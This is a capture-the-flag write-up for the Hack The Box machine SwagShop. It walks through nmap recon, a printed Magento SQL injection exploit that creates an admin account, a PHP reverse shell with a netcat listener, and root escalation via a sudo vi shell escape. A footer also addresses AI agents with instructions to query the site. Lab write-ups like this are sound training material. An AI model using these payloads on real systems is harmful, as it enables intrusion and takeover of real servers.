# SwagShop HTB IP ``` 10.10.10.140 ``` initial nmap scan ``` sudo nmap -p- --min-rate 10000 10.10.10.140 | cut -d"/" -f1 | tr '\n' ',' ``` we can see we have the following two ports open `22,80` Lets run a more in-depth scan of the target ``` sudo nmap -sCV -p22,80 10.10.10.140 -oA nmap_results ``` results ``` Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-18 01:47 EST Nmap scan report for 10.10.10.140 Host is up (0.026s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA) | 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA) |_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Did not follow redirect to http://swagshop.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds ``` we can see the following * SSH is running * Apache 2.4.29 is in place (web server) * Domain name `swagshop.htb` we can add this to our hosts file **HTTP Port 80** Lets get feroxbuster running in the background to identify any interesting web pages ``` feroxbuster -u http://swagshop.htb/ -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php ``` Looking at the web server we can see the following

Already we can see the webserver is * Ubuntu server * running magento * magento 2014 is vulnerable to RCE * runs on php * MySQLis present When we look at the about us we can see a possible username

`John Doe` We can see there is an option to create an account Lets create an account a proxy through Burp and see if there are any interesting requests being made * We now have an account * nothing to interesting Let's see if we can exploit Magento looking at the \`\` which we found with feroxbuster we can confirm the version of Magento ``` 1.8.0.0.23.2 ``` after some quick googling we can see this version is vulnerable to SQLI which we can utilise to create a admin account on the system we can use the following script {% embed url="" %} What is the actual scripts doing This script appears to perform SQLI on a Magento CMS (Content Management System) website. It targets the admin interface of the Magento CMS and attempts to create a new admin user with specified credentials. Here's a step-by-step breakdown: 1. **Import Libraries:** ```python import requests import base64 import sys ``` 2. **Retrieve Target URL:** ```python target = sys.argv[1] ``` The script expects the target website URL as a command-line argument. 3. **Ensure Target URL Format:** ```python if not target.startswith("http"): target = "http://" + target if target.endswith("/"): target = target[:-1] ``` These lines ensure that the target URL starts with "http\://" and does not end with a trailing slash. 4. **Construct Target URL for Admin Interface:** ```python target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/" ``` The target URL is constructed for the Magento admin interface. 5. **SQL Injection Payload:** ```python SQLQUERY = """ SET @SALT = 'rp'; SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT )); SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL; INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW()); INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname'); """ ``` This is the SQL injection payload. It inserts a new admin user into the `admin_user` table with a specified username and password. 6. **Format and Encode Payload:** ```python query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123") pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query) ``` The payload is formatted into a single line, and the username and password are specified. The payload is then encoded using base64. 7. **Craft HTTP Request:** ```python r = requests.post(target_url, data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ", "filter": base64.b64encode(pfilter), "forwarded": 1}) ``` An HTTP POST request is sent to the target URL with the encoded payload. 8. **Check Response:** ```python if r.ok: print "WORKED" print "Check {0}/admin with creds ypwq:123".format(target) else: print "DID NOT WORK" ``` If the request is successful (HTTP status code 200), it prints a success message along with the admin URL and credentials. Otherwise, it prints a failure message. Okay once we have ran the script we should get a admin user within the Content Management System so ``` python2 exploit.py 10.10.10.140 ```

Now when we navigate to the \`\` we can use the supplied creds and access the system Looking through the CMS we can see we have the option to add pages and knowing the site runs off php we could potentially upload a php reverse shell and gain access to the system We will use PHP monkeys reverse shell ``` cp /usr/share/webshells/php/php-reverse-shell.php ./ ``` edit the script with our local ip and port

Lets start a nc listner ``` rlwrap -cAr nc -lvnp 9001 ``` Now lets upload the php file * hmmm this didnt seem to work when we tried to upload the file as a page, Lets re think this What we can is add a custom option within one of the files, that allows for uploading php files to do this we can within the **catalogue** -> **manage products** we can Edit one of the existing products

within the left panel we click on Custom Options

click on Add New Option then we would specify a file and extention

Click save Now when we navigate to the chosen product we can see the ability to upload a php file

Once we have uploaded our reverse shell and added the product to cart we should be able to navigate to {% embed url="" %} we can see our shell sitting here once we click it it will call back to our lkistner

## Priv esc via www-data First lets stabilize our shell ``` python3 -c "import pty;pty.spawn(/'bin/bash)" ``` Checking our sudo privs ``` sudo -l ```

we can run vi as root this is good lets check out {% embed url="" %} so we can run vi as root on any file within the `/var/www/html` directory ``` sudo /usr/bin/vi /var/www/html/index.php # within vi :set shell=/bin/sh :shell ``` we are now root

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://getoutofmysystem.gitbook.io/ctf-write-ups/walk-throughs/htb-linux-machines/swagshop-htb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.